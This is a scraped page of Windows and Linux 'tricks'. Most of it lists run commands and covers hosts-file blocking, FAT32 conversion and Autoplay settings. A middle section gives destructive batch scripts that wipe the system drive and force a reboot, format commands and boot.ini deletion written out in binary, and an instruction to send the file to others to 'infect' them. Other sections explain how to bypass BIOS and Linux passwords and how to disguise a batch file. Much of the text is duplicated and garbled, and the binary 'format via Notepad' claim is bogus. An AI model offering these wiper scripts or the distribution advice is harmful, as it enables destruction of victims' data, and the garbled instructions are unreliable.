These are window tips for Operating . they 100% working .
How to hide the Bat file code without using any third party software .
Step 1: Open the word pad.
Start > Run > word pad .
Copy the bat file and paste it into the word pad .
Step 2: Now right click on the bat file.
Step 3: Click on edit package. A new window will appear. Go to Edit menu.
Step 4: Click on edit menu and select the copy package.
Step 5: Now go to the place where you want to save the file. Like I went to c: drive. Then just paste the file.
Step 6: A new file will be there with name of scrap. It will work as a batch file, when you will double click on this.
Start > Run > word pad .
Copy the bat file and paste it into the word pad .
Step 2: Now right click on the bat file.
Step 3: Click on edit package. A new window will appear. Go to Edit menu.
Step 4: Click on edit menu and select the copy package.
Step 5: Now go to the place where you want to save the file. Like I went to c: drive. Then just paste the file.
Step 6: A new file will be there with name of scrap. It will work as a batch file, when you will double click on this.
Step 7: If you will try to open the file in wordpad, it will be in
encoded form.
Cracking Linux Password when Grub cannot be changed
However, if the Grub is password
protected, then this method will not work. So in such cases, we can use the
Linux Live CD to crack the Linux Password. Follow the below given steps to
change the Linux Password, using the Linux Live CD.
- Boot your computer from your Linux Live CD, choosing “Try Linux without any change to your computer” from the boot menu.
- Once the system boots open up a new Terminal window and then type in the following command:
- sudofdisk –l
- This command is used to tell what device name the hard drive is using, which in most cases should be /dev/sda1, but could be different on your system.
- Now you’ll need to create a directory to mount the hard drive on. Since we’re actually booting off the live cd, the directory doesn’t really get created anywhere.
- sudomkdir /media/sda1
- The next command will mount the hard drive in the /media/sda1 folder.
- sudo mount /dev/sda1 /media/sda1
- Now it’s time for the command that actually does the magic:
- chroot.
- This command is used to open up a shell with a different root directory than the current shell is using, and we’ll pass in the folder where we mounted the hard drive.
- sudochroot /media/sda1
- Now you should be able to use the passwd command to change your user account’s password, and it will be applied to the hard drive since we are using chroot.
- passwd<username>
- Now you should be able to reboot your system and log yourself in with your new password.
How
To Hack A Bios Password
Step2=> To reset a BIOS password, the password prompt that you must pass in order for the PC to boot, you could try clearing the CMOS settings by jumping the corresponding pins on the motherboard. Open the PC case and locate the pins labeled "Clear" or "PWD". If you are able to locate them, place a jumper on the two pins, connecting them together. When the PC is powered on with the pins jumped, it will bypass the password in many cases.
Step3=> Another way to reset the BIOS password is to remove the CMOS battery backup. When you open the case and look at the motherboard, this battery resembles a large, flat watch battery and on most motherboards, it may be removed temporarily. Remove the battery for 15 minutes, replace it, and try turning the PC back on.
Step4=> An additional method is to overload the keyboard buffer by holding down a key on the keyboard from the moment the PC is powered on. This seldom works, but in some cases, it will prompt an error message and take the user through to the BIOS setup.
Step5=> Trick for bypassing the BIOS password on many Toshiba laptops. Acquire a DB25 printer cable. Remove the sheath from around the cable connector and note that the pins are labeled 1 through 25. Connect and solder the following wires together: (1+5+10), (2+11), (3+17), (4+12), (6+16), (7+13), (8+14), and (9+15). Protect each connection by wrapping it in electric tape. Connect the cable connector to the printer port on the back of the laptop and power it on. If done correctly, the laptop will boot directly to the operating system, bypassing the BIOS password.
Step6=> If the BIOS password is not your problem or if you made it through that password and you are confronted by the operating system password on a Windows machine.
In that caes, When the computer is booting and has just finished the power-on self test, begin tapping the F8 key. Windows should redirect to a screen prompting several different ways to boot. Choose "Safe Mode." Too many people neglect to set a password for the administrator account on Windows computers. If this is the case, you can access the administrator account and change the password for the account that you were originally trying to access.
Step7=> If the administrator password has been set and you cannot gain access to it, don't worry, there are different types of software available that will allow you access to any Windows PC or laptop. Some do cost money. I do not want to endorse any of them specifically, but do a search on the internet and you will surely find them.
Create
your own Run Command
2. Enter %windir% and press enter to open the Windows Directory
3. Go to File > New > Shortcut.
4. Go through the wizard to create a shortcut to the desired program, the name you give to the shortcut is what you type in the Run dialog to start the program.
Follow
the steps to protect your system from virus
1) Click on Start button and go to RUN.
2)Type “gpedit.msc” without quotes in Run.
3)Go to computer configuration-> Administrative Templates -> System
4)Scroll down to “Turn off Autoplay” and double click on it.
5)Now click on the “Enabled” radio button, then for “Turn off Autoplay on” select “All drives”
1) Click on Start button and go to RUN.
2)Type “gpedit.msc” without quotes in Run.
3)Go to computer configuration-> Administrative Templates -> System
4)Scroll down to “Turn off Autoplay” and double click on it.
5)Now click on the “Enabled” radio button, then for “Turn off Autoplay on” select “All drives”
If you think that Notepad is useless
then you are wrong because you can now do a lot of things with the Notepad
which you could have never imagined. In this hack I will show you how to format
a HDD using Notepad. This is really cool.
Step 1 => Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 => Save As An EXE Any Name Will Do
Step 3 => Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
Step 1 => Copy The Following In Notepad Exactly as it is.
says01001011000111110010010101010101010000011111100000
Step 2 => Save As An EXE Any Name Will Do
Step 3 => Send the EXE to People And Infect
OR
IF you think cannot format C Drive when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary code
format c:\ /Q/X — this will format your drive c:\
01100110011011110111001001101101011000010111010000 100000011000110011101001011100
0010000000101111010100010010111101011000
format d:\ /Q/X — this will format your dirve d:\
01100110011011110111001001101101011000010111010000 100000011001000011101001011100
0010000000101111010100010010111101011000
format a:\ /Q/X — this will format your drive a:\
01100110011011110111001001101101011000010111010000 100000011000010011101001011100
0010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini — this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 101111010100110010111101010001
00100000011000110011101001011100011000100110111101 101111011101000010111001101001
0110111001101001
try to figure out urself rest
cant spoonfeed
its working
Do not try it on your PC. Don’t mess around this is for educational purpose only
still if you cant figure it out try this
go to notepad and type the following:
@Echo off
Del C:\ *.*|y
save it as Dell.bat
want worse then type the following:
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
Great trick Lock ur PC yourself
lock
ur pc.. open notepad copy and paste the script below and save it .VBS extention
This
wil create a shortcut.. run(click) it
set
WshShell = WScript.CreateObject("WScript.Shell")
set
oShellLink =
WshShell.CreateShortcut(wshShell.SpecialFolders("Desktop") &
"\LockWorkstation.lnk")
oShellLink.TargetPath
= "%windir%\system32\rundll32.exe"
oShellLink.Arguments
= "user32.dll,LockWorkStation"
oShellLink.Save
first
select a folder for example i'll use a folder name movies in D drive D:\movies\
in
the same drive u create a text file and type
ren
movies movies.{21EC2020-3AEA-1069-A2DD-08002B30309D}
and
save it as loc.bat
again
u type in a notepad as
ren
movies.{21EC2020-3AEA-1069-A2DD-08002B30309D} movies
and
save it as key.bat
now
in D drive u can see two batch files loc and key.. when u double click loc the
movie folder will change to control panel and whn u double click key the control
panel will change to normal folder..
there
are two more different tricks in dis site to lock ur pc down in a unique ways..
donno where i have typed it.. !!!
How
to Block A Website in All Web Browsers
This action will require you to edit
your Host file. Your host file is a computer file used to store information on
where to find a node on a computer network. For more a more detailed
description. Check out this link Host File Description Link
In Windows XP
1. Click Start->All Programs->Accessories->Command Prompt2. Click Command Prompt This will open a DOS command window.
3. Type: notepad C:/Windows/System32/drivers/etc/hosts
4. Locate the line 127.0.0.1 localhost
5. To block the website google.com for example, just add this text under 127.0.0.1 localhost:
127.0.0.1 google.com
127.0.0.1 www.google.com
In Windows XP
1. Click Start->All Programs->Accessories->Command Prompt2. Click Command Prompt This will open a DOS command window.
3. Type: notepad C:/Windows/System32/drivers/etc/hosts
4. Locate the line 127.0.0.1 localhost
5. To block the website google.com for example, just add this text under 127.0.0.1 localhost:
127.0.0.1 google.com
127.0.0.1 www.google.com
You can add as many sites any site, However you will need to prefix it with "127.0.0.1".
6. Save the file .
Google will now be blocked in all web browser. This is an advanced but easy method on how to blow a website.
How To Convert Fat32 Partiton Into NTFS In Win Xp
- Go to start->Run type cmd and press Enter.
- Type VOL C: and note down the information for volume c. (Change drive letter to the drive you want to convert)
- Now type CONVERT C:/FS:NTFS. (Instead of C: enter any drive name you wan Converting FAT32 to NTFS Remember, do not switch off your PC directly when the process is going on.
- Now check your drive by repeating step 2.
How
to hide Data in Notepad
1=> Open command
prompt, you may change to any directory as you like to create the text file.
2=> Type notepad MyFile.txt:StoreHiddenData then press enter. MyFile.txt is the text file you are going to create whereas StoreHiddenData is the alternate stream name.
3=> A message will be pop up “Cannot find the C:\MyFile.txt:StoreHiddenData.txt file”. Do you want to create a new file?”, click OK button to proceed create the new file.
4=> A notepad will be pop up. Type any data that you want to be hidden from others. Save the file and you are now successfully creating hidden data for this file.
2=> Type notepad MyFile.txt:StoreHiddenData then press enter. MyFile.txt is the text file you are going to create whereas StoreHiddenData is the alternate stream name.
3=> A message will be pop up “Cannot find the C:\MyFile.txt:StoreHiddenData.txt file”. Do you want to create a new file?”, click OK button to proceed create the new file.
4=> A notepad will be pop up. Type any data that you want to be hidden from others. Save the file and you are now successfully creating hidden data for this file.
If you have more then one
operating system installed or wish to remove an operating system from the boot menu, you
can use the following information.
1.Click on Start, Control Panel, System,
Advanced.
2.Under Startup and Recovery, click Settings.
3.Under Default Operating System, choose one
of the following:
"Microsoft Windows XP Professional
/fastdetect"
-or-
"Microsoft Windows XP Home
/fasdetect"
4.Take the checkmark out of the box for
"Time to display a list of Operating Systems".
5.Click Apply and Ok, and reboot the system.
*If you wish to edit the boot.ini file
manually, click on the button "EDIT".
Full Codes. Kindly Add if
U know more !
Add Hardware Wizard |
hdwwiz.cpl
|
Add/Remove Programs
|
appwiz.cpl
|
Accessibility Controls
|
access.cpl
|
Administrative Tools
|
control admintools
|
Automatic Updates
|
wuaucpl.cpl
|
Bluetooth Transfer Wizard
|
fsquirt
|
Calculator
|
calc
|
Certificate Manager
|
certmgr.msc
|
Character Map
|
charmap
|
Check Disk Utility
|
chkdsk
|
Clipboard Viewer
|
clipbrd
|
Command Prompt
|
cmd
|
Component Services
|
dcomcnfg
|
Computer Management
|
compmgmt.msc
|
timedate.cpl
|
ddeshare
|
Device Manager
|
devmgmt.msc
|
Direct X Control Panel (If Installed)*
|
directx.cpl
|
Direct X Troubleshooter
|
dxdiag
|
Disk Cleanup Utility
|
cleanmgr
|
Disk Defragment
|
dfrg.msc
|
Disk Management
|
diskmgmt.msc
|
Disk Partition Manager
|
diskpart
|
Display Properties
|
control desktop
|
Display Properties
|
desk.cpl
|
Display Properties (w/Appearance Tab Preselected)
|
control color
|
Dr. Watson System Troubleshooting Utility
|
drwtsn32
|
Driver Verifier Utility
|
verifier
|
Event Viewer
|
eventvwr.msc
|
File Signature Verification Tool
|
sigverif
|
Findfast
|
findfast.cpl
|
Folders Properties
|
control folders
|
Fonts
|
control fonts
|
Fonts Folder
|
fonts
|
Free Cell Card Game
|
freecell
|
Game Controllers
|
joy.cpl
|
Group Policy Editor (XP Prof)
|
gpedit.msc
|
Hearts Card Game
|
mshearts
|
Iexpress Wizard
|
iexpress
|
Indexing Service
|
ciadv.msc
|
Internet Properties
|
inetcpl.cpl
|
IP Configuration (Display Connection Configuration)
|
ipconfig /all
|
IP Configuration (Display DNS Cache Contents)
|
ipconfig /displaydns
|
IP Configuration (Delete DNS Cache Contents)
|
ipconfig /flushdns
|
IP Configuration (Release All Connections)
|
ipconfig /release
|
IP Configuration (Renew All Connections)
|
ipconfig /renew
|
IP Configuration (Refreshes DHCP & Re-Registers DNS)
|
ipconfig /registerdns
|
IP Configuration (Display DHCP Class ID)
|
ipconfig /showclassid
|
IP Configuration (Modifies DHCP Class ID)
|
ipconfig /setclassid
|
Java Control Panel (If Installed)
|
jpicpl32.cpl
|
Java Control Panel (If Installed)
|
javaws
|
Keyboard Properties
|
control keyboard
|
Local Security Settings
|
secpol.msc
|
Local Users and Groups
|
lusrmgr.msc
|
Logs You Out Of Windows
|
logoff
|
Microsoft Chat
|
winchat
|
Minesweeper Game
|
winmine
|
Mouse Properties
|
control mouse
|
Mouse Properties
|
main.cpl
|
Network Connections
|
control netconnections
|
Network Connections
|
ncpa.cpl
|
Network Setup Wizard
|
netsetup.cpl
|
Notepad
|
notepad
|
Nview Desktop Manager (If Installed)
|
nvtuicpl.cpl
|
Object Packager
|
packager
|
ODBC Data Source Administrator
|
odbccp32.cpl
|
On Screen Keyboard
|
osk
|
Opens AC3 Filter (If Installed)
|
ac3filter.cpl
|
Password Properties
|
password.cpl
|
Performance Monitor
|
perfmon.msc
|
Performance Monitor
|
perfmon
|
Phone and Modem Options
|
telephon.cpl
|
Power Configuration
|
powercfg.cpl
|
Printers and Faxes
|
control printers
|
Printers Folder
|
printers
|
Private Character Editor
|
eudcedit
|
Quicktime (If Installed)
|
QuickTime.cpl
|
Regional Settings
|
intl.cpl
|
Registry Editor
|
regedit
|
Registry Editor
|
regedit32
|
Remote Desktop
|
mstsc
|
Removable Storage
|
ntmsmgr.msc
|
Removable Storage Operator Requests
|
ntmsoprq.msc
|
Resultant Set of Policy (XP Prof)
|
rsop.msc
|
Scanners and Cameras
|
sticpl.cpl
|
Scheduled Tasks
|
control schedtasks
|
Security Center
|
wscui.cpl
|
Services
|
services.msc
|
Shared Folders
|
fsmgmt.msc
|
Shuts Down Windows
|
shutdown
|
Sounds and Audio
|
mmsys.cpl
|
Spider Solitare Card Game
|
spider
|
SQL Client Configuration
|
cliconfg
|
System Configuration Editor
|
sysedit
|
System Configuration Utility
|
msconfig
|
System File Checker Utility (Scan Immediately)
|
sfc /scannow
|
System File Checker Utility (Scan Once At Next Boot)
|
sfc /scanonce
|
System File Checker Utility (Scan On Every Boot)
|
sfc /scanboot
|
System File Checker Utility (Return to Default Setting)
|
sfc /revert
|
System File Checker Utility (Purge File Cache)
|
sfc /purgecache
|
System File Checker Utility (Set Cache Size to size x)
|
sfc /cachesize=x
|
System Properties
|
sysdm.cpl
|
Task Manager
|
taskmgr
|
Telnet Client
|
telnet
|
User Account Management
|
nusrmgr.cpl
|
Utility Manager
|
utilman
|
Windows Firewall
|
firewall.cpl
|
Windows Magnifier
|
magnify
|
Windows Management Infrastructure
|
wmimgmt.msc
|
Windows System Security Tool
|
syskey
|
Windows Update Launches
|
wupdmgr
|
Windows XP Tour Wizard
|
tourstart
|
Wordpad
|
write
|
Run line commands can be very useful some times, its better to
know them here are all the commands that i know u might find them
usefull too Commands are same for Windows xp pro and home
Run
Line Commands
These are GUI applications that can be opened from the run line.
These applications are not located in the C:\windows\system32\ directory, the
keys for these applications are located in the registry under:
HKLM\software\microsoft\windows\currentversion\app paths
BCKGZM.EXE - Backgammon
CHKRZM.EXE - Checkers
CONF.EXE - NetMeeting
DIALER.EXE - Phone Dialer
HELPCTR.EXE - Help and Support
HRTZZM.EXE - Internet Hearts
HYPERTRM.EXE - HyperTerminal
ICWCONN1.EXE - Internet Connection Wizard
IEXPLORE.EXE - Internet Explorer
INETWIZ.EXE - Setup Your Internet Connection
INSTALL.EXE - User's Folder
MIGWIZ.EXE - File and Settings Transfer Wizard
MOVIEMK.EXE - Windows Movie Maker
MPLAYER2.EXE - Windows Media Player Version 6.4.09.1120
MSCONFIG.EXE - System Configuration Utility
MSIMN.EXE - Outlook Express
MSINFO32.EXE - System Information
MSMSGS.EXE - Windows Messenger
MSN6.EXE - MSN Explorer
PBRUSH.EXE - Paint
PINBALL.EXE - Pinball
RVSEZM.EXE - Reversi
SHVLZM.EXE - Spades
TABLE30.EXE - User's Folder
WAB.EXE - Windows Address Book
WABMIG.EXE - Address Book Import Tool
WINNT32.EXE - User's Folder
WMPLAYER.EXE - Windows Media Player
WRITE.EXE - Wordpad
These .EXE files reside in (c:\windows\system32\) or (c:\windows\) directory.
ACCWIZ.EXE - Accessibility Wizard
CALC.EXE - Calculator
CHARMAP.EXE - Character Map
CLEANMGR.EXE - Disk Space Cleanup Manager
CLICONFG.EXE - SQL Client Configuration Utility
CLIPBRD.EXE - Clipbook Viewer
CLSPACK.EXE - Class Package Export Tool
CMD.EXE - Command Line
CMSTP.EXE - Connection Manager Profile Installer
CONTROL.EXE - Control Panel
DCOMCNFG.EXE - Component Services
DDESHARE.EXE - DDE Share
DRWATSON.EXE - Doctor Watson v1.00b
DRWTSN32.EXE - Doctor Watson Settings
DVDPLAY.EXE - DVD Player
DXDIAG.EXE - DirectX Diagnostics
EUDCEDIT.EXE - Private Character Editor
EVENTVWR.EXE - Event Viewer
EXPLORER.EXE - Windows Explorer
FREECELL.EXE - Free Cell
FXSCLNT.EXE - Fax Console
FXSCOVER.EXE - Fax Cover Page Editor
FXSEND.EXE - MS Fax Send Note Utility
IEXPRESS.EXE - IExpress 2.0
LOGOFF.EXE - System Logoff
MAGNIFY.EXE - Microsoft Magnifier
MMC.EXE - Microsoft Management Console
MOBSYNC.EXE - Microsoft Synchronization Manager
MPLAY32.EXE - Windows Media Player version 5.1
MSHEARTS.EXE - Hearts
MSPAINT.EXE - Paint
MSTSC.EXE - Remote Desktop Connection
NARRATOR.EXE - Microsoft Narrator
NETSETUP.EXE - Network Setup Wizard
NOTEPAD.EXE - Notepad
NSLOOKUP.EXE - NSLookup Application
NTSD.EXE - Symbolic Debugger for Windows 2000
ODBCAD32.EXE - ODBC Data Source Administrator
OSK.EXE - On Screen Keyboard
OSUNINST.EXE - Windows Uninstall Utility
PACKAGER.EXE - Object Packager
PERFMON.EXE - Performance Monitor
PROGMAN.EXE - Program Manager
RASPHONE.EXE - Remote Access Phonebook
REGEDIT.EXE - Registry Editor
REGEDT32.EXE - Registry Editor
RESET.EXE - Resets Session
RSTRUI.EXE - System Restore
RTCSHARE.EXE - RTC Application Sharing
SFC.EXE - System File Checker
SHRPUBW.EXE - Create Shared Folder
SHUTDOWN.EXE - System Shutdown
SIGVERIF.EXE - File Signature Verification
SNDREC32.EXE - Sound Recorder
SNDVOL32.EXE - Sound Volume
SOL.EXE - Solitaire
SPIDER.EXE - Spider Solitaire
SYNCAPP.EXE - Create A Briefcase
SYSEDIT.EXE - System Configuration Editor
SYSKEY.EXE - SAM Lock Tool
TASKMGR.EXE - Task Manager
TELNET.EXE - MS Telnet Client
TSSHUTDN.EXE - System Shutdown
TOURSTART.EXE - Windows Tour Launcher
UTILMAN.EXE - System Utility Manager
USERINIT.EXE - My Documents
VERIFIER.EXE - Driver Verifier Manager
WIAACMGR.EXE - Scanner and Camera Wizard
WINCHAT.EXE - Windows for Workgroups Chat
WINHELP.EXE - Windows Help Engine
WINHLP32.EXE - Help
WINMINE.EXE - Minesweeper
WINVER.EXE - Windows Version Information
WRITE.EXE - WordPad
WSCRIPT.EXE - Windows Script Host Settings
WUPDMGR.EXE - Windows Update
The following are Control Panel applets that can be run from the run line.
They are located in the c:\windows\system32 directory, and have the file type
extension ".CPL".
ACCESS.CPL - Accessibility Options
APPWIZ.CPL - Add or Remove Programs
DESK.CPL - Display Properties
HDWWIZ.CPL - Add Hardware Wizard
INETCPL.CPL - Internet Explorer Properties
INTL.CPL - Regional and Language Options
JOY.CPL - Game Controllers
MAIN.CPL - Mouse Properties
MMSYS.CPL - Sounds and Audio Device Properties
NCPA.CPL - Network Connections
NUSRMGR.CPL - User Accounts
ODBCCP32.CPL - ODBC Data Source Administrator
POWERCFG.CPL - Power Options Properties
SYSDM.CPL - System Properties
TELEPHON.CPL - Phone and Modem Options
TIMEDATE.CPL - Date and Time Properties
The following are Microsoft Management Console Snap-ins that can be opened from
the run line. These applications have the file type extension ".MSC".
CERTMGR.MSC - Certificates
CIADV.MSC - Indexing Service
COMPMGMT.MSC - Computer Management
DEVMGMT.MSC - Device Manager
DFRG.MSC - Disk Defragmenter
DISKMGMT.MSC - Disk Management
EVENTVWR.MSC - Event Viewer
FSMGMT.MSC - Shared Folders
LUSRMGR.MSC - Local Users and Groups
NTMSMGR.MSC - Removable Storage
NTMSOPRQ.MSC - Removable Storage Operator Requests
PERFMON.MSC - Performance Monitor
SERVICES.MSC - Services
WMIMGMT.MSC - Windows Management Infrastructure